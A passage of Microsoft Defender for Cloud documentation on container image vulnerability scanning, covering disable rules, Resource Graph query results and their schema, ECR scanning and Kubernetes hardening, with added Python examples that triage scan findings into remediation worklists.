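    Finding("registry", "CVE-2020-1346", DIGEST_B, "alpine_3.17", "Medium", "NoFixAvailable"),
    Finding("registry", "CVE-2021-3711", DIGEST_B, "alpine_3.17", "Critical", "FixAvailable"),
]

if __name__ == "__main__":
    rule = DisableRule.from_portal("registry", cves="CVE-2017-17512", minimum_severity="Medium",
                                   justification="vendor will not fix; low severities accepted")
    active, hidden = apply_rules(SAMPLE_FINDINGS, [rule])
    for f in active:
        print("active", f.recommendation, f.cve, f.severity)
    for f, r in hidden:
        print("hidden", f.recommendation, f.cve, f.severity, "->", r.justification)
```

Running the dry run above shows the two points that are easy to get wrong in the portal: the rule scoped to the registry recommendation leaves the identical CVE on the running-images recommendation active, and a minimum severity of Medium hides Medium findings as well as Low ones.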


Note


The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability.


To create a rule: 


1. From the recommendation details page for Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) or Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management), select Disable rule.


2. Select the relevant scope. 
3. Define your criteria. You can use any combination of the criteria described above: CVE, image digest, OS version, minimum severity, and fix status.


4. In the justification text box, add your justification for why a specific vulnerability was disabled. This provides clarity and understanding for anyone reviewing the rule.


5. Select Apply rule. 


[Screenshot: Disable rule pane on the Running container images should have vulnerability findings resolved recommendation (severity High, freshness interval 24 hours, 1 unhealthy cluster contoso-aks-prd in subscription CyberSecSOC, 9 vulnerable images out of 14 scanned). Pane fields: Disable findings that match any of the following criteria: CVEs, Image digest, OS version, Minimum severity (None), Fix status (None); Justification (optional); Trigger logic app. Note shown in the pane: new disable rules applied to a subscription might take up to 30 minutes to take effect; new rules on a management group might take up to 24 hours; a rule on the management group applies to and overrides any rules that may exist on underlying subscriptions.]


Important


Changes might take up to 24 hours to take effect. 


To view, override, or delete a rule: 
1. From the recommendations detail page, select Disable rule. 
2. From the scope list, subscriptions with active rules show as Rule applied. 
3. To view or delete the rule, select the ellipsis menu ("..."). 


4. Do one of the following: 


e To view or override a disable rule - select View rule, make any changes you want, and select Override rule. 


e To delete a disable rule - select Delete rule. 


[Screenshot: Disabled findings view showing a rule's parameters: CVE ID, Image digest, OS version (Ubuntu), Minimum severity (None), Fix status (None), Justification (optional)]

Next steps 


• Learn how to view and remediate vulnerability assessment findings for registry images.

• Learn about agentless container posture.


Container vulnerability assessments REST API

Article · 09/18/2023


Overview 


Azure Resource Graph (ARG) provides a REST API that can be used to programmatically access vulnerability assessment results for both Azure registry and runtime vulnerability recommendations. Learn more about ARG references and query examples.


Azure container registry vulnerabilities sub assessments are published to ARG as part of 
the security resources. For more information, see: 


• Security Resources ARG Query Samples
• Generic Security Sub Assessment Query


ARG query examples 


To pull specific sub-assessments, you need the assessment key. For container vulnerability assessment powered by MDVM the key is c0b7cfc6-3172-465a-b378-53c7ff2cc0d5.

The following is a generic security sub-assessment query that can be used as a starting point for your own queries. It returns the container registry sub-assessments generated in the last hour.


kql

securityresources
| where type =~ "microsoft.security/assessments/subassessments" and properties.additionalData.assessedResourceType == "AzureContainerRegistryVulnerability"
| extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id)
| where assessmentKey == "c0b7cfc6-3172-465a-b378-53c7ff2cc0d5"
| extend timeGenerated = properties.timeGenerated
| where timeGenerated > ago(1h)


Query result 


JSON

[
  {
    "id": "/subscriptions/{SubscriptionId}/resourceGroups/{ResourceGroup}/providers/Microsoft.ContainerRegistry/registries/{RegistryName}/providers/Microsoft.Security/assessments/c0b7cfc6-3172-465a-b378-53c7ff2cc0d5/subassessments/{SubAssessmentId}",
    "name": "{SubAssessmentId}",
    "type": "microsoft.security/assessments/subassessments",
    "tenantId": "{TenantId}",
    "kind": "",
    "location": "global",
    "resourceGroup": "{ResourceGroup}",
    "subscriptionId": "{SubscriptionId}",
    "managedBy": "",
    "sku": null,
    "plan": null,
    "properties": {
      "id": "CVE-2022-42969",
      "additionalData": {
        "assessedResourceType": "AzureContainerRegistryVulnerability",
        "vulnerabilityDetails": {
          "severity": "High",
          "exploitabilityAssessment": {
            "exploitStepsPublished": false,
            "exploitStepsVerified": false,
            "isInExploitKit": false,
            "exploitUris": [],
            "types": [
              "Remote"
            ]
          },
          "lastModifiedDate": "2023-09-12T00:00:00Z",
          "publishedDate": "2022-10-16T06:15:00Z",
          "workarounds": [],
          "references": [
            {
              "title": "CVE-2022-42969",
              "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"
            },
            {
              "title": "oval:org.opensuse.security:def:202242969",
              "link": "https://ftp.suse.com/pub/projects/security/oval/suse.linux.enterprise.server.15.xml.gz"
            },
            {
              "title": "oval:com.microsoft.cbl-mariner:def:11166",
              "link": "https://raw.githubusercontent.com/microsoft/CBL-MarinerVulnerabilityData/main/cbl-mariner-1.0-oval.xml"
            },
            {
              "title": "ReDoS in py library when used with subversion ",
              "link": "https://github.com/advisories/GHSA-w596-4wvx-j9j6"
            }
          ],
          "weaknesses": {
            "cwe": [
              {
                "id": "{CweId}"
              }
            ]
          },
          "cveId": "CVE-2022-42969",
          "cvss": {
            "2.0": null,
            "3.0": {
              "cvssVectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
              "base": 7.5
            }
          },
          "cpe": {
            "language": "*",
            "softwareEdition": "*",
            "version": "*",
            "targetHardware": "*",
            "targetSoftware": "python",
            "vendor": "py",
            "edition": "*",
            "product": "py",
            "update": "*",
            "other": "*",
            "part": "Applications",
            "uri": "cpe:2.3:a:py:py:*:*:*:*:*:python:*:*"
          }
        },
        "artifactDetails": {
          "lastPushedToRegistryUTC": "2023-09-04T16:05:32.8223098Z",
          "repositoryName": "public/azureml/aifx/stable-ubuntu2004-cu117-py39-torch200",
          "registryHost": "ptebic.azurecr.io",
          "artifactType": "ContainerImage",
          "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
          "digest": "sha256:4af8e6f002401a965bbe753a381af308b40d8947fad2b9e1f6a369aa81abee59",
          "tags": [
            "biweekly.202309.1"
          ]
        },
        "softwareDetails": {
          "category": "Language",
          "language": "python",
          "fixedVersion": "",
          "version": "1.11.0",
          "vendor": "py",
          "packageName": "py",
          "osDetails": {
            "osPlatform": "linux",
            "osVersion": "ubuntu_linux_20.04"
          },
          "fixStatus": "FixAvailable",
          "evidence": []
        },
        "cvssV30Score": 7.5
      },
      "description": "This vulnerability affects the following vendors: Pytest, Suse, Microsoft, Py. To view more details about this vulnerability please visit the vendor website.",
      "displayName": "CVE-2022-42969",
      "resourceDetails": {
        "id": "/repositories/public/azureml/aifx/stable-ubuntu2004-cu117-py39-torch200/images/sha256:4af8e6f002401a965bbe753a381af308b40d8947fad2b9e1f6a369aa81abee59",
        "source": "Azure"
      },
      "timeGenerated": "2023-09-12T13:36:15.0772799Z",
      "remediation": "No remediation exists",
      "status": {
        "description": "Disabled parent assessment",
        "severity": "High",
        "code": "NotApplicable",
        "cause": "Exempt"
      }
    },
    "tags": null,
    "identity": null,
    "zones": null,
    "extendedLocation": null,
    "assessmentKey": "c0b7cfc6-3172-465a-b378-53c7ff2cc0d5",
    "timeGenerated": "2023-09-12T13:36:15.0772799Z"
  }
]
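Two things about this payload matter once you consume it in code rather than in the portal: the query returns exempted and disabled findings too (this sample has status.code NotApplicable with cause Exempt), and fixStatus can read FixAvailable while fixedVersion is empty. The following Python, an added example that is not part of this article or of the product, turns rows of this shape into a per-image remediation worklist, skipping non-active rows and separating findings with a concrete fixed version from those that need review. SAMPLE_ROWS is constructed: image names, digests and CVE ids are taken from this article, while the exploit flags, fix statuses and installed versions are illustrative. Run subassessment_query() against your tenant (for example with az graph query -q) and pass the returned rows to build_worklist().

```python
"""Build a remediation worklist from Azure Resource Graph container sub-assessments.

Added example, not part of this article or the Defender for Cloud product.
SAMPLE_ROWS mirrors the shape of the query result above with constructed values.
"""
import json
from collections import defaultdict

MDVM_CONTAINER_VA_KEY = "c0b7cfc6-3172-465a-b378-53c7ff2cc0d5"
SEVERITY_RANK = {"Critical": 4, "High": 3, "Medium": 2, "Low": 1, "Unknown": 0}


def subassessment_query(window="1h", key=MDVM_CONTAINER_VA_KEY):
    """The article's ARG query, parameterised on assessment key and time window."""
    return "\n".join([
        "securityresources",
        '| where type =~ "microsoft.security/assessments/subassessments" and '
        'properties.additionalData.assessedResourceType == "AzureContainerRegistryVulnerability"',
        '| extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id)',
        f'| where assessmentKey == "{key}"',
        "| extend timeGenerated = properties.timeGenerated",
        f"| where timeGenerated > ago({window})",
    ])


def finding_from_row(row):
    """Flatten one sub-assessment row to the fields a remediation owner needs."""
    props = row["properties"]
    extra = props["additionalData"]
    vuln, art, sw = extra["vulnerabilityDetails"], extra["artifactDetails"], extra["softwareDetails"]
    exploit = vuln.get("exploitabilityAssessment") or {}
    return {
        "image": f'{art["registryHost"]}/{art["repositoryName"]}@{art["digest"]}',
        "cve": vuln["cveId"],
        "severity": vuln["severity"],
        "cvss": extra.get("cvssV30Score"),
        "package": sw["packageName"],
        "installed": sw["version"],
        # fixStatus can read FixAvailable while fixedVersion is empty (the sample
        # above does exactly that), so only a concrete version string counts as a fix.
        "fixed": sw.get("fixedVersion") or None,
        "fix_status": sw["fixStatus"],
        "exploit_public": bool(exploit.get("exploitStepsPublished") or exploit.get("isInExploitKit")),
        "status": props["status"]["code"],   # Unhealthy, Healthy or NotApplicable
    }


def build_worklist(rows):
    """Group active findings per image; rank by public exploit, then severity, then count."""
    per_image = defaultdict(list)
    for row in rows:
        f = finding_from_row(row)
        # ARG also returns exempted or disabled findings (status NotApplicable);
        # the portal hides those, and so does this worklist.
        if f["status"] == "Unhealthy":
            per_image[f["image"]].append(f)
    worklist = []
    for image, findings in per_image.items():
        upgrade = defaultdict(set)
        for f in findings:
            if f["fixed"]:
                upgrade[f["package"]].add(f["fixed"])
        worklist.append({
            "image": image,
            "exploit_public": any(f["exploit_public"] for f in findings),
            "max_severity": max((f["severity"] for f in findings), key=SEVERITY_RANK.__getitem__),
            "findings": len(findings),
            # package -> fixed versions to pin when rebuilding; when several are listed,
            # pick the highest with the distro's comparator (dpkg --compare-versions).
            "upgrade": {p: sorted(v) for p, v in upgrade.items()},
            "no_fix": sorted(f["cve"] for f in findings if not f["fixed"] and f["fix_status"] != "FixAvailable"),
            "needs_review": sorted(f["cve"] for f in findings if not f["fixed"] and f["fix_status"] == "FixAvailable"),
        })
    worklist.sort(key=lambda w: (w["exploit_public"], SEVERITY_RANK[w["max_severity"]], w["findings"]),
                  reverse=True)
    return worklist


def _row(host, repo, digest, cve, severity, cvss, package, installed, fixed, fix_status,
         exploit_published=False, status="Unhealthy"):
    """Constructed sample row carrying only the fields finding_from_row() reads."""
    return {"properties": {"id": cve, "status": {"code": status}, "additionalData": {
        "assessedResourceType": "AzureContainerRegistryVulnerability", "cvssV30Score": cvss,
        "vulnerabilityDetails": {"cveId": cve, "severity": severity, "exploitabilityAssessment": {
            "exploitStepsPublished": exploit_published, "isInExploitKit": False}},
        "artifactDetails": {"registryHost": host, "repositoryName": repo, "digest": digest},
        "softwareDetails": {"packageName": package, "version": installed,
                            "fixedVersion": fixed, "fixStatus": fix_status}}}}


GOAT = ("contosoregistry01.azurecr.io", "k8s-goat-system-monitor",
        "sha256:a3aae97c994ca36c1c7f1cd49354206229685b725c4c1c0a23b823599b2211bf")
AIFX = ("ptebic.azurecr.io", "public/azureml/aifx/stable-ubuntu2004-cu117-py39-torch200",
        "sha256:4af8e6f002401a965bbe753a381af308b40d8947fad2b9e1f6a369aa81abee59")
# Image names, digests and CVE ids come from this article; exploit flags, fix
# statuses and installed versions are constructed for illustration.
SAMPLE_ROWS = [
    _row(*GOAT, "CVE-2021-3711", "Critical", 9.8, "openssl", "1.1.1-1ubuntu2.1~18.04.5",
         "1.1.1-1ubuntu2.1~18.04.13", "FixAvailable", exploit_published=True),
    _row(*GOAT, "CVE-2020-10543", "Critical", 8.2, "perl-base", "5.26.1-6ubuntu0.3",
         "5.26.1-6ubuntu0.5", "FixAvailable"),
    _row(*GOAT, "CVE-2022-42969", "High", 7.5, "py", "1.11.0", "", "FixAvailable"),
    _row(*AIFX, "CVE-2022-42969", "High", 7.5, "py", "1.11.0", "", "FixAvailable", status="NotApplicable"),
    _row(*AIFX, "CVE-2016-0718", "Critical", 9.8, "expat", "2.1.0-6", "", "WontFix"),
]

if __name__ == "__main__":
    print(subassessment_query())
    print(json.dumps(build_worklist(SAMPLE_ROWS), indent=2))
```

The upgrade map is what feeds the rebuild: each package and the version to pin. Entries under no_fix are the candidates for a disable rule (fix status WontFix or NoFixAvailable) or for a base-image change, and entries under needs_review are the ones the scanner calls fixable without naming a version, which you resolve from the vendor advisory in the finding's references.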
Definitions

Name | Description
AzureResourceDetails | Details of the Azure resource that was assessed
AzureContainerVulnerability | More context fields for container registry Vulnerability assessment
CVE | CVE Details
CVSS | CVSS Details
SecuritySubAssessment | Security subassessment on a resource
SecuritySubAssessmentList | List of security subassessments
ArtifactDetails | Details for the affected container image
SoftwareDetails | Details for the affected software package
FixReference | Details on the fix, if available
OS Details | Details on the os information
VulnerabilityDetails | Details on the detected vulnerability
CPE | Common Platform Enumeration
Cwe | Common weakness enumeration
VulnerabilityReference | Reference links to vulnerability
ExploitabilityAssessment | Reference links to an example exploit

AzureContainerRegistryVulnerability (MDVM)

Other context fields for Azure container registry vulnerability assessment

Name | Type | Description
assessedResourceType | string: AzureContainerRegistryVulnerability | Subassessment resource type
cvssV30Score | Numeric | CVSS V3 Score
vulnerabilityDetails | VulnerabilityDetails |
artifactDetails | ArtifactDetails |
softwareDetails | SoftwareDetails |

ArtifactDetails

Context details for the affected container image

Name | Type | Description
repositoryName | String | Repository name
RepositoryHost | String | Repository host
lastPublishedToRegistryUTC | Timestamp | UTC timestamp for last publish date
artifactType | String: ContainerImage |
mediaType | String | Layer media type
Digest | String | Digest of vulnerable image
Tags | String | Tags of vulnerable image

Software Details

Details for the affected software package

Name | Type | Description
fixedVersion | String |
category | String | Vulnerability category: OS or Language
osDetails | OsDetails |
language | String | Language of affected package (for example, Python, .NET); could also be empty
version | String |
vendor | String |
packageName | String |
fixStatus | String | Unknown, FixAvailable, NoFixAvailable, Scheduled, WontFix
evidence | String | Evidence for the package
fixReference | FixReference |

FixReference

Details on the fix, if available

Name | Type | Description
ID | String | Fix ID
Description | String | Fix Description
releaseDate | Timestamp | Fix timestamp
url | String | URL to fix notification

OS Details

Details on the os information

Name | Type | Description
osPlatform | String | For example: Linux, Windows
osName | String | For example: Ubuntu
osVersion | String |

VulnerabilityDetails

Details on the detected vulnerability

Name | Type | Description
Severity | Severity | The sub-assessment severity level
LastModifiedDate | Timestamp |
publishedDate | Timestamp | Published date
ExploitabilityAssessment | ExploitabilityAssessment |
CVSS | Dictionary <string, CVSS> | Dictionary from cvss version to cvss details object
Workarounds | Workaround | Published workarounds for vulnerability
References | VulnerabilityReference |
Weaknesses | Weakness |
cveId | String | CVE ID
Cpe | CPE |

CPE (Common Platform Enumeration)

Name | Type | Description
language | String | Language tag
softwareEdition | String |
Version | String | Package version
targetSoftware | String | Target Software
vendor | String | Vendor
product | String | Product
edition | String |
update | String |
other | String |
part | String | Applications, Hardware, OperatingSystems
uri | String | CPE 2.3 formatted uri

Weakness

Name | Type | Description
Cwe | Cwe |

Cwe (Common weakness enumeration)

CWE details

Name | Type | Description
ID | String | CWE ID

VulnerabilityReference

Reference links to vulnerability

Name | Type | Description
link | String | Reference url
title | String | Reference title

ExploitabilityAssessment

Reference links to an example exploit

Name | Type | Description
exploitUris | String |
exploitStepsPublished | Boolean | Had the exploit steps been published
exploitStepsVerified | Boolean | Had the exploit steps been verified
isInExploitKit | Boolean | Is part of the exploit kit
types | String | Exploit types, for example: NotAvailable, Dos, Local, Remote, WebApps, PrivilegeEscalation

AzureResourceDetails

Details of the Azure resource that was assessed

Name | Type | Description
ID | string | Azure resource ID of the assessed resource
source | string: Azure | The platform where the assessed resource resides

SecuritySubAssessment

Security subassessment on a resource

Name | Type | Description
ID | string | Resource ID
name | string | Resource name
properties.additionalData | AdditionalData: AzureContainerRegistryVulnerability | Details of the subassessment
properties.category | string | Category of the subassessment
properties.description | string | Human readable description of the assessment status
properties.displayName | string | User friendly display name of the subassessment
properties.id | string | Vulnerability ID
properties.impact | string | Description of the impact of this subassessment
properties.remediation | string | Information on how to remediate this subassessment
properties.resourceDetails | ResourceDetails: AzureResourceDetails | Details of the resource that was assessed
properties.status | SubAssessmentStatus | Status of the subassessment
properties.timeGenerated | string | The date and time the subassessment was generated
type | string | Resource type

SecuritySubAssessmentList

List of security subassessments

Name | Type | Description
nextLink | string | The URI to fetch the next page.
value | SecuritySubAssessment | Security subassessment on a resource
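The following is an added example, not Microsoft's code: it consumes a SecuritySubAssessmentList shaped like the response and definitions above and ranks the open container findings, skipping anything the API has already exempted (status code NotApplicable, as in the response above). SAMPLE is a hand-built payload; the CVE-0000-* IDs, digests, repository and package names in it are constructed placeholders.

```python
# Added example (not Microsoft's code): triages a SecuritySubAssessmentList
# payload shaped like the response and definitions above. SAMPLE is a
# hand-built payload; its CVE-0000-* IDs, digests and package names are
# constructed placeholders, not real findings from any registry.

PLACEHOLDER_DIGEST_A = "sha256:" + "a" * 64   # constructed image digest
PLACEHOLDER_DIGEST_B = "sha256:" + "b" * 64   # constructed image digest


def _finding(cve, status, score, repo, digest, package, fix, fixed_version="",
             exploit_published=False, in_exploit_kit=False):
    """Build one SecuritySubAssessment item using the field names from the
    AzureContainerRegistryVulnerability definitions tables."""
    return {
        "type": "Microsoft.Security/assessments/subAssessments",
        "name": cve.lower(),
        "properties": {
            "id": cve,
            "displayName": cve,
            "status": {"code": status, "severity": "High"},
            "additionalData": {
                "assessedResourceType": "AzureContainerRegistryVulnerability",
                "cvssV30Score": score,
                "vulnerabilityDetails": {
                    "cveId": cve,
                    "exploitabilityAssessment": {
                        "exploitStepsPublished": exploit_published,
                        "isInExploitKit": in_exploit_kit,
                    },
                },
                "artifactDetails": {"repositoryName": repo, "digest": digest},
                "softwareDetails": {"packageName": package, "fixStatus": fix,
                                    "fixedVersion": fixed_version},
            },
        },
    }


# Constructed list: one exempted finding like the one in the response above,
# two critical findings (one on each image) and one medium finding.
SAMPLE = {"value": [
    _finding("CVE-2022-42969", "NotApplicable", 7.5, "public/azureml/aifx",
             PLACEHOLDER_DIGEST_A, "py", "FixAvailable"),
    _finding("CVE-0000-0001", "Unhealthy", 9.8, "team/api", PLACEHOLDER_DIGEST_A,
             "libexample", "FixAvailable", "2.4.1", exploit_published=True),
    _finding("CVE-0000-0002", "Unhealthy", 9.8, "team/worker", PLACEHOLDER_DIGEST_B,
             "libother", "NoFixAvailable"),
    _finding("CVE-0000-0003", "Unhealthy", 5.3, "team/api", PLACEHOLDER_DIGEST_A,
             "py", "FixAvailable", "1.12.0"),
]}


def triage(subassessments, min_score=0.0):
    """Rank open (Unhealthy) container findings: highest CVSS first, then
    published exploit evidence, then an available fix. Exempted (NotApplicable)
    and Healthy items are dropped, as are other assessedResourceType values."""
    ranked = []
    for item in subassessments["value"]:
        props = item["properties"]
        data = props.get("additionalData", {})
        if props["status"]["code"] != "Unhealthy":
            continue
        if data.get("assessedResourceType") != "AzureContainerRegistryVulnerability":
            continue
        score = float(data.get("cvssV30Score", 0.0))
        if score < min_score:
            continue
        exploit = data["vulnerabilityDetails"].get("exploitabilityAssessment", {})
        software = data["softwareDetails"]
        ranked.append({
            "cve": data["vulnerabilityDetails"]["cveId"],
            "repository": data["artifactDetails"]["repositoryName"],
            "digest": data["artifactDetails"]["digest"],
            "package": software["packageName"],
            "fix": software["fixStatus"],
            "fixed_version": software.get("fixedVersion") or None,
            "exploited": bool(exploit.get("exploitStepsPublished")
                              or exploit.get("isInExploitKit")),
            "score": score,
        })
    ranked.sort(key=lambda f: (-f["score"], not f["exploited"],
                               f["fix"] != "FixAvailable", f["cve"]))
    return ranked


def fix_plan(findings):
    """Group fixable findings by image digest into {package: fixedVersion}:
    the package upgrades to apply before rebuilding and re-pushing that image."""
    plan = {}
    for f in findings:
        if f["fix"] == "FixAvailable" and f["fixed_version"]:
            plan.setdefault(f["digest"], {})[f["package"]] = f["fixed_version"]
    return plan
```

Note that the exempted CVE-2022-42969 item never reaches the ranking even though its fixStatus is FixAvailable; an exemption is a decision recorded in the status, not in the software details.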


Use Defender for Containers to scan your Amazon AWS Elastic Container Registry images for vulnerabilities (Preview)

Article • 06/14/2023


Defender for Containers lets you scan the container images stored in your Amazon AWS 
Elastic Container Registry (ECR) as part of the protections provided within Microsoft 
Defender for Cloud. 


To enable scanning of vulnerabilities in containers, you have to connect your AWS 
account to Defender for Cloud and enable Defender for Containers. The agentless 
scanner, powered by the open-source scanner Trivy, scans your ECR repositories and 
reports vulnerabilities. 


Defender for Containers creates resources in your AWS account to build an inventory of 
the software in your images. The scan then sends only the software inventory to 
Defender for Cloud. This architecture protects your information privacy and intellectual 
property, and also keeps the outbound network traffic to a minimum. 


These resources are created under us-east-1 and eu-central-1 in each AWS account 
where container vulnerability assessment is enabled: 


- S3 bucket with the prefix defender-for-containers-va
- ECS cluster with the name defender-for-containers-va
- VPC
  - Tag name with the value defender-for-containers-va
  - IP subnet CIDR 10.0.0.0/16
  - Associated with default security group with the tag name and the value defender-for-containers-va that has one rule of all incoming traffic.
  - Subnet with the tag name and the value defender-for-containers-va in the defender-for-containers-va VPC with the CIDR 10.0.1.0/24 IP subnet used by the ECS cluster defender-for-containers-va
  - Internet Gateway with the tag name and the value defender-for-containers-va
  - Route table - Route table with the tag name and value defender-for-containers-va, and with these routes:
    - Destination: 0.0.0.0/0; Target: Internet Gateway with the tag name and the value defender-for-containers-va
    - Destination: 10.0.0.0/16; Target: local


Defender for Cloud filters and classifies findings from the software inventory that the scanner creates. Images without vulnerabilities are marked as healthy and Defender for Cloud doesn't send notifications about healthy images to keep you from getting unwanted informational alerts.

The triggers for an image scan are:

- On push - Whenever an image is pushed to your registry, Defender for Containers automatically scans that image within 2 hours.
- Continuous scan - Defender for Containers reassesses the images based on the latest database of vulnerabilities of Trivy. This reassessment is performed twice a day for 90 days after an image is pushed to the registry.


Prerequisites 


Before you can scan your ECR images:

- Connect your AWS account to Defender for Cloud and enable Defender for Containers
- You must have at least one free VPC in the us-east-1 and eu-central-1 regions to host the AWS resources that build the software inventory.

For a list of the types of images not supported by Microsoft Defender for Containers, see Availability.


Enable vulnerability assessment 
To enable vulnerability assessment: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the AWS connector that connects to your AWS account. 


[Screenshot: Microsoft Defender for Cloud | Environment settings, listing Azure subscriptions and AWS accounts (preview) with their Defender coverage and standards]


3. In the Monitoring Coverage section of the Containers plan, select Settings. 


[Screenshot: Settings | Defender plans for the AWS connector, on the Select plans step, showing the available plans and their monitoring coverage]
4. Turn on Vulnerability assessment.

[Screenshot: Defender for Containers configuration pane, with Kubernetes audit logs to Microsoft Defender set to On, a retention period of 30 days, and the Vulnerability assessment toggle that enables vulnerability assessment for your ECR images]

5. Select Save > Next: Configure access.

6. Download the CloudFormation template.

7. Using the downloaded CloudFormation template, create the stack in AWS as instructed on screen. If you're onboarding a management account, you'll need to run the CloudFormation template both as Stack and as StackSet. It takes up to 30 minutes for the AWS resources to be created. The resources have the prefix defender-for-containers-va.

8. Select Next: Review and generate.

9. Select Update.


Findings are available as Defender for Cloud recommendations from 2 hours after vulnerability assessment is turned on. The recommendation also shows any reason that a repository is identified as not scannable ("Not applicable"), such as images pushed more than 3 months before you enabled vulnerability assessment.


View and remediate findings 


Vulnerability assessment lists the repositories with vulnerable images as the results of the Elastic container registry images should have vulnerability findings resolved recommendation. From the recommendation, you can identify vulnerable images and get details about the vulnerabilities.


Vulnerability findings for an image are still shown in the recommendation for 48 hours 
after an image is deleted. 


1. To view the findings, open the Recommendations page. If the scan found issues, you'll see the recommendation Elastic container registry images should have vulnerability findings resolved.

[Screenshot: Recommendations list showing Elastic container registry images should have vulnerability findings resolved under the Remediate vulnerabilities security control]


2. Select the recommendation. 


The recommendation details page opens with additional information. This 
information includes the list of repositories with vulnerable images ("Affected 
resources") and the remediation steps. 


3. Select specific repositories to see the vulnerabilities found in images in those repositories.

[Screenshot: Recommendation details page for Elastic container registry images should have vulnerability findings resolved, listing the unhealthy repositories with their vulnerability counts and severities]


The vulnerabilities section shows the identified vulnerabilities. 
4. To learn more about a vulnerability, select the vulnerability. 


The vulnerability details pane opens. 


[Screenshot: Vulnerability details pane for a CVE, with title and description, additional information, weakness details, source, remediation/patch details, and the affected resources (digest, OS, repository, account, region)]


This pane includes a detailed description of the issue and links to external 
resources to help mitigate the threats. 


5. Follow the steps in the remediation section of the recommendation. 


6. When you've taken the steps required to remediate the security issue, replace the 
image in your registry: 


a. Push the updated image to trigger a scan. 


b. Check the recommendations page for the recommendation Container registry images should have vulnerability findings resolved.


If the recommendation still appears and the image you've handled still appears 
in the list of vulnerable images, check the remediation steps again. 


c. When you're sure the updated image has been pushed, scanned, and is no 


longer appearing in the recommendation, delete the “old” vulnerable image 
from your registry. 


Next steps 
Learn more about: 


- Defender for Cloud Defender plans
- Multicloud protections for your AWS account
- Check out common questions about Defender for Containers.


Protect your Kubernetes data plane hardening

Article • 09/04/2023

This page describes how to use Microsoft Defender for Cloud's set of security recommendations dedicated to Kubernetes data plane hardening.

Tip

For a list of the security recommendations that might appear for Kubernetes clusters and nodes, see the Container recommendations section of the recommendations reference table.


Set up your workload protection 


Microsoft Defender for Cloud includes a bundle of recommendations that are available once you've installed the Azure Policy for Kubernetes.


Prerequisites 


- Add the Required FQDN/application rules for Azure policy.
- (For non AKS clusters) Connect an existing Kubernetes cluster to Azure Arc.


Enable Kubernetes data plane hardening 


You can enable the Azure Policy for Kubernetes by one of two ways: 


- Enable for all current and future clusters using plan/connector settings
  - Enabling for Azure subscriptions or on-premises
  - Enabling for GCP projects
- Deploy Azure Policy for Kubernetes on existing clusters


Enable Azure Policy for Kubernetes for all current and 
future clusters using plan/connector settings 


Note


When you enable this setting, the Azure Policy for Kubernetes pods are installed on 
the cluster. Doing so allocates a small amount of CPU and memory for the pods to 
use. This allocation might reach maximum capacity, but it doesn't affect the rest of 
the CPU and memory on the resource. 


Note


Enablement for AWS via the connector is not supported due to a limitation in EKS 
that requires the cluster admin to add permissions for a new IAM role on the 
cluster itself. 


Enabling for Azure subscriptions or on-premises 


When you enable Microsoft Defender for Containers, the "Azure Policy for Kubernetes" 
setting is enabled by default for the Azure Kubernetes Service, and for Azure Arc- 
enabled Kubernetes clusters in the relevant subscription. If you disable the setting on 
initial configuration, you can enable it afterwards manually. 


If you disabled the "Azure Policy for Kubernetes" settings under the containers plan, you 
can follow the below steps to enable it across all clusters in your subscription: 


1. Sign in to the Azure portal.

2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant subscription. 

4. On the Defender plans page, ensure that Containers is toggled to On. 


5. Select Settings. 


[Screenshot: Settings | Defender plans page for the selected subscription]

6. In the Settings & Monitoring page, toggle the "Azure Policy for Kubernetes" to On. 


[Screenshot: Settings & monitoring page for the Containers plan, listing the Defender DaemonSet, Azure Policy for Kubernetes and Container registries vulnerability assessments (preview) components with their status toggles]

Enabling for GCP projects 


When you enable Microsoft Defender for Containers on a GCP connector, the "Azure 
Policy Extension for Azure Arc" setting is enabled by default for the Google Kubernetes 
Engine in the relevant project. If you disable the setting on initial configuration, you can 
enable it afterwards manually. 


If you disabled the "Azure Policy Extension for Azure Arc" settings under the GCP 
connector, you can follow the below steps to enable it on your GCP connector. 


Deploy Azure Policy for Kubernetes on existing clusters 


You can manually configure the Azure Policy for Kubernetes on existing Kubernetes clusters through the Recommendations page. Once enabled, the hardening recommendations become available (some of the recommendations require another configuration to work).


Note

For AWS it isn't possible to do onboarding at scale using the connector, but it can be installed on all existing clusters or on specific clusters using the recommendation Azure Arc-enabled Kubernetes clusters should have the Azure policy extension for Kubernetes extension installed.


To deploy the Azure Policy for Kubernetes to specified clusters: 


1. From the recommendations page, search for the relevant recommendation:

   - Azure - "Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed"
   - GCP - "GKE clusters should have the Azure Policy extension".
   - AWS and On-premises - "Azure Arc-enabled Kubernetes clusters should have the Azure policy extension for Kubernetes extension installed".


[Screenshot: Microsoft Defender for Cloud | Recommendations page, filtered to Azure, AWS and GCP, listing security controls with their max score, current score, potential score increase, status and unhealthy resources]

Tip

The recommendation is included in different security controls, and it doesn't matter which one you select in the next step.


2. From any of the security controls, select the recommendation to see the resources 
on which you can install the add-on. 


3. Select the relevant cluster, and select Remediate. 


[Screenshot: Recommendation details for Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed, with the remediation steps and the affected resources tabs (Unhealthy, Healthy, Not applicable)]

View and configure the bundle of recommendations

Approximately 30 minutes after the Azure Policy for Kubernetes installation completes, Defender for Cloud shows the clusters' health status for the following recommendations, each in the relevant security control as shown:


Note

If you're installing the Azure Policy for Kubernetes for the first time, these recommendations will appear as new additions in the list of recommendations.


Tip

Some recommendations have parameters that must be customized via Azure Policy to use them effectively. For example, to benefit from the recommendation Container images should be deployed only from trusted registries, you'll have to define your trusted registries. If you don't enter the necessary parameters for the recommendations that require configuration, your workloads will be shown as unhealthy.


Recommendation name | Security Control | Configuration required
Container CPU and memory limits should be enforced | Protect applications against DDoS attack | Yes
Container images should be deployed only from trusted registries | Remediate vulnerabilities | Yes
Least privileged Linux capabilities should be enforced for containers | Manage access and permissions | Yes
Containers should only use allowed AppArmor profiles | Remediate security configurations | Yes
Services should listen on allowed ports only | Restrict unauthorized network access | Yes
